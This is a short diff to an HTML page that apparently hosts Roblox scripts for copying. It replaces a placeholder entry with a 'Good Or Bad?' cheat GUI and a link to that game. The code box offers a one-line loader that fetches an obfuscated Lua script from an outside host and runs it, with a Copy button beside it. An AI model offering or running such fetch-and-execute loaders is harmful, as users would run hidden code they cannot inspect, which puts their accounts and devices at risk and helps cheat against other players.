--- a/index.html
+++ b/index.html
@@ -332,14 +332,14 @@
 
             
 <div class="script-item new-style">
-    <div class="script-header">h</div>
-    <div class="subheader">A brief description of what this script does.</div>
-    <div class="script-code">print("h")
+    <div class="script-header">🚨 Good Or Bad?</div>
+    <div class="subheader">OP, a GUI with 12 features!</div>
+    <div class="script-code">loadstring(game:HttpGet("https://getorbs.us.to/GOB-obfuscated.lua"))()
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
         <!-- Optional: Add a button to join the game -->
-        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/123456789/My-New-Game')">Game link</button>
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/137583690300688/Good-Or-Bad')">Game link</button>
     </div>
 </div>
 
